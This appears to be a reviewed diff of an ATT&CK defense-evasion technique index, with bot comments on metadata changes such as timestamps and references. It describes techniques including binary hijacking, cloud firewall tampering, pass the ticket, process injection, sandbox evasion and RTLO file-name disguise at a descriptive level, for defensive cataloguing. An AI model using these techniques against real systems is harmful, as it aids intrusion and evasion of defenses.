Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
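Review bot: modified for T1574.005 regresses from 2020-10-27T14:49:39.188Z to 2020-03-26T19:20:23.030Z with no other change in this hunk, so the same timestamp-ordering concern applies as for the other backdated techniques in this patch. Separately, the Stefan Kanthak reference visible in the context lines is dated December 8, 2015 but recorded as 'Retrieved December 4, 2014', a year before it was posted; that inconsistency comes from the upstream ATT&CK data and is not introduced here, but it is worth reporting upstream rather than carrying forward indefinitely.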
@@ -6753,8 +6873,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
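Review bot: the rewritten T1562.007 description ends with a trailing space inside the quoted string ('...T1499). "'), which will surface in rendered output; harmless to the YAML parser, but trim it if the generator post-processes description text at all. On substance, the new wording scopes the behaviour to 'an adversary with appropriate permissions', adds lateral movement from the cloud control plane to the data plane and the creation of entirely new security groups, and links Brute Force and Endpoint Denial of Service as follow-on uses. The x_mitre_detection text just below is unchanged ('Monitor cloud logs for modification or creation of new security groups or firewall rules'), which still covers the newly described creation case, so no detection update is needed for this hunk.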
@@ -6879,7 +7002,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -6956,8 +7078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -7116,7 +7233,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
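Review bot: the reference list for T1550.003 is only reordered, all four `source_name` entries are present before and after, so the real change in this hunk is the `GentilKiwi Pass the Ticket` URL moving from `http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos` to a `web.archive.org` snapshot with a new retrieved date of September 12, 2024. That is the right fix for a link that no longer resolves, but the reorder makes a one-line URL swap look like a rewrite; emitting `external_references` in a stable order from the generator would keep such fixes reviewable on their own.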
@@ -7225,7 +7342,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests: []
T1055.004:
@@ -7264,7 +7380,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
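Review bot: the `modified` timestamp for T1055.004 goes backwards in this hunk, from 2022-04-25 to 2021-10-18, and the same regression appears below for T1647, T1600.002, T1612, T1055.002, T1218.012, T1218.005, T1205.001, T1564.002, T1562.003, T1556.008, T1134.004, T1055.014, T1574.010, T1574.013, T1542.004 and T1070.005. Every one of the old values shares the identical time of day `14:00:00.188Z`, which reads as a batch stamp rather than an upstream modification time, so the new values are plausibly the accurate ones; still, confirm which ATT&CK export this run was generated from and note it in the commit message, because a reviewer seeing dates move backwards will otherwise assume stale data was pulled in.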
@@ -7313,8 +7429,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
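Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1055.004 without adding a replacement, unlike the T1070 and T1550.003 hunks above where the field is bumped to 3.2.0; the same pattern recurs for T1600.002, T1055.002, T1218.005, T1205.001, T1574.013 and T1542.004. If those objects are meant to inherit the spec version from somewhere else, say so in the commit message; otherwise they are left with no spec version at all, and a consumer that branches on that field will treat them differently from the objects that were bumped.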
@@ -7365,7 +7479,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -7386,7 +7500,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -7453,7 +7566,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -7476,7 +7588,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -7497,8 +7609,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -7559,11 +7669,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -7628,7 +7737,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -7652,7 +7760,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -7696,8 +7804,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -7753,7 +7859,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -7777,7 +7883,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -7868,40 +7973,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -7913,6 +7989,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -7923,8 +8003,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -7934,9 +8020,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
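Review bot: the `Deloitte Environment Awareness` reference for T1497 changes in two ways in this hunk: the Google Drive URL gains an `/edit` suffix and the retrieved date moves from May 18, 2021 to September 13, 2024 (the same change appears for T1497.002 further down). It is worth confirming that the `/edit` form still resolves for readers who have no edit rights on the file, since a citation that cannot be opened is a regression even when the date is fresher. Every other field of T1497 survives the reorder, with `revoked: false` and `x_mitre_deprecated: false` added, so the key order is the only reason this hunk is as large as it is.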
@@ -7989,7 +8094,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
@@ -8027,68 +8132,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
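Review bot: the substantive changes to T1480 are easy to lose under the full key reorder: a third description paragraph on user-agent based guardrails, the new `Trellix-Qakbot` reference that paragraph cites, the `x_mitre_version` bump from '1.1' to '1.2', and a `modified` date of 2024-06-07. The new citation does resolve to an entry in `external_references`, which is the check that matters here. The `x_mitre_detection` text is unchanged, so the detection guidance still only covers host-side discovery activity and says nothing about the server-side user-agent filtering the new paragraph describes; that is an upstream gap rather than something to fix in this change, but anyone writing detections from this record should be aware that the description now covers behaviour the detection field does not.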
@@ -8146,7 +8255,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -8172,7 +8280,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
